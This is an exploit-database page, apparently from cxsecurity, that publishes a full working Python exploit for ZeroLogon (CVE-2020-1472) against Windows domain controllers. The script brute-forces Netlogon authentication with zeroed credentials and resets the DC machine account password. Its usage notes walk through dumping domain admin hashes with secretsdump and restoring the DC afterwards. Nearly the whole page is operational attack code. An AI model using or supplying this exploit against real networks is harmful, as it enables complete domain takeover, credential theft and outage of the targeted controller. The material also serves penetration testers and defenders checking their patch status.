ZeroLogon Netlogon Elevation of Privilege

2020.11.19
Credit: West Shepherd
Risk: Medium
Local: Yes
Remote: No
CWE: CWE-269


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

# Exploit Title: ZeroLogon - Netlogon Elevation of Privilege # Date: 2020-10-04 # Exploit Author: West Shepherd # Vendor Homepage: https://www.microsoft.com # Version: Microsoft Windows Server 2019, Windows Server 2016, Windows Server 2012 R2, Windows Server 2012, Windows Server 2008 R2 # Tested on: Microsoft Windows Server 2016 Standard x64 # CVE : CVE-2020-1472 # Credit to: Tom Tervoort for discovery and Dirk-Janm for Impacket code # Sources: https://www.secura.com/pathtoimg.php?id=2055 # Requirements: python3 and impacket 0.9.21+ (tested using this version) #!/usr/bin/env python3 import hmac, hashlib, struct, sys, socket, time, argparse, logging, codecs from binascii import hexlify, unhexlify from subprocess import check_call from impacket.dcerpc.v5.dtypes import NULL, MAXIMUM_ALLOWED from impacket.dcerpc.v5 import nrpc, epm, transport from impacket import crypto, version from impacket.examples import logger from Cryptodome.Cipher import AES from struct import pack, unpack from impacket.dcerpc.v5.rpcrt import DCERPCException class Exploit: def __init__( self, name='', address='', attempts=2000, password='' ): name = name.rstrip('$') self.secureChannelType = nrpc.NETLOGON_SECURE_CHANNEL_TYPE\ .ServerSecureChannel self.authenticator = self.getAuthenticator(stamp=0) self.clearNewPasswordBlob = b'\x00' * 516 self.primaryName = ('\\\\%s' % name) + '\x00' self.accountName = ('%s$' % name) + '\x00' self.computerName = name + '\x00' self.clientCredential = b'\x00' * 8 self.clientChallenge = b'\x00' * 8 self.negotiateFlags = 0x212fffff self.address = address self.max = attempts self.dce = None self.sessionKey = None self.clientStoredCredential = None self.password = password def encodePassword(self, password): if isinstance(password, str): password = password.encode('utf-8') return b'\x00' * (512 - len(password))\ + password \ + pack('<L', len(password)) def getAuthenticator(self, creds=b'\x00' * 8, stamp=10): authenticator = nrpc.NETLOGON_AUTHENTICATOR() authenticator['Credential'] = creds authenticator['Timestamp'] = stamp return authenticator def serverReqChallenge(self): try: binding = epm.hept_map( self.address, nrpc.MSRPC_UUID_NRPC, protocol='ncacn_ip_tcp' ) self.dce = transport.DCERPCTransportFactory(binding).get_dce_rpc() self.dce.connect() self.dce.bind(nrpc.MSRPC_UUID_NRPC) return nrpc.hNetrServerReqChallenge( self.dce, self.primaryName, self.computerName, self.clientChallenge ) except BaseException as ex: self.logError(ex) def serverAuthenticate(self): try: auth = nrpc.hNetrServerAuthenticate3( self.dce, self.primaryName, self.accountName, self.secureChannelType, self.computerName, self.clientCredential, self.negotiateFlags ) assert auth['ErrorCode'] == 0 self.logInfo('successfully authenticated') return True except nrpc.DCERPCSessionError as ex: self.dce = None if ex.get_error_code() == 0xc0000022: return None else: self.logFail(ex.get_error_code()) except BaseException as ex: self.dce = None self.logFail(ex) self.dce = None def serverPasswordSet(self): try: return nrpc.hNetrServerPasswordSet2( self.dce, self.primaryName, self.accountName, self.secureChannelType, self.computerName, self.authenticator, self.clearNewPasswordBlob ) except BaseException as ex: self.logError(ex) def authenticate(self): self.logInfo( 'checking target, attempting to authenticate %d max attempts' % self.max ) for attempt in range(0, self.max): self.logInfo('attempt %d' % attempt) self.serverReqChallenge() self.serverAuthenticate() if self.dce is not None: break if self.dce: return True else: self.logError('failed to authenticate') def exploit(self): self.logInfo('attempting password reset') reset = self.serverPasswordSet() if reset['ErrorCode'] == 0: self.logInfo('successfully reset password') else: self.logError('failed to reset password') return self def ComputeNetlogonCredentialAES(self, challenge): return nrpc.ComputeNetlogonCredentialAES( challenge, self.sessionKey ) def logInfo(self, message): sys.stdout.write("[+] %s\n" % str(message)) return self def logError(self, message): sys.stderr.write("[-] error %s\n" % str(message)) def logFail(self, message): sys.stderr.write("[!] failure %s\n" % str(message)) sys.exit(2) def restore(self): self.logInfo('attempting to restore password') self.clientChallenge = b'12345678' try: self.primaryName = NULL challenge = self.serverReqChallenge() self.sessionKey = nrpc.ComputeSessionKeyAES( '', self.clientChallenge, challenge['ServerChallenge'] ) self.clientCredential = self.ComputeNetlogonCredentialAES( self.clientChallenge ) try: self.serverAuthenticate() except Exception as e: if str(e).find('STATUS_DOWNGRADE_DETECTED') < 0: raise self.logInfo('restoring password') self.clientStoredCredential = pack('<Q', unpack('<Q', self.clientCredential)[0] + 10) self.authenticator = self.getAuthenticator( creds=self.ComputeNetlogonCredentialAES(self.clientStoredCredential) ) self.clearNewPasswordBlob = self.ComputeNetlogonCredentialAES( self.encodePassword(self.password) ) reset = self.serverPasswordSet() if reset['ErrorCode'] == 0: self.logInfo('successfully restored password') else: self.logError('failed to restore password') except Exception as ex: self.logError(ex) return self if __name__ == '__main__': info = """ NOTE - Exploitation will break the DC until restored, recommended guidelines: 1. Check the DC - usually ~300 attempts, use the NETBIOS name not the FQDN: cve-2020-1472.py -do check -target <NETBIOS NAME> -ip <IP> 2. Exploit the DC - this will break the DC until restored: cve-2020-1472.py -do exploit <NETBIOS NAME> -ip <IP> 3. Dump the DC - for the DA hashes, this will not contain the machine hex-pass: secretsdump.py -just-dc -no-pass <NETBIOS NAME>\$@<IP> 4. Dump the DC again - use the DA hash to get the machines hex-pass: secretsdump.py -no-pass -hashes <LMHASH>:<NTHASH> <DOMAIN>/<ADMIN>@<IP> 5. Restore target - this fixes the DC: cve-2020-1472.py -do restore -target <NETBIOS NAME> -ip <IP> -hex <HEXPASS> """ parser = argparse.ArgumentParser( description='CVE-2020-1472 ZeroLogon Exploit - Netlogon Elevation of Privilege', add_help=True ) try: parser.add_argument('-do', default='check', action='store', help='What to do (default check): [check|restore|exploit]') parser.add_argument('-target', action='store', help='NETBIOS name of target DC (not the FQDN)') parser.add_argument('-ip', action='store', help='IP address of target DC') parser.add_argument('-password', default='', action='store', help='The plaintext password to use to reset the DC') parser.add_argument('-hex', default='', action='store', help='The hex password to use to restore the DC (recommended)') parser.add_argument('-max', default=2000, action='store', help='Max attempts to authenticate with the DC (usually ~300 or less)') if len(sys.argv) < 3: parser.print_help() print(info) sys.exit(1) options = parser.parse_args() if options.do.lower() == 'check': Exploit( name=options.target, address=options.ip, attempts=int(options.max) ).authenticate() elif options.do.lower() == 'exploit': exp = Exploit( name=options.target, address=options.ip, attempts=int(options.max) ) if exp.authenticate(): exp.exploit() elif options.do.lower() == 'restore': if options.hex != '' and options.password == '': options.password = unhexlify(options.hex) if options.password != '': exp = Exploit( name=options.target, address=options.ip, password=options.password ).restore() else: parser.print_help() except Exception as error: sys.stderr.write('[-] error in main %s\n' % str(error))


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top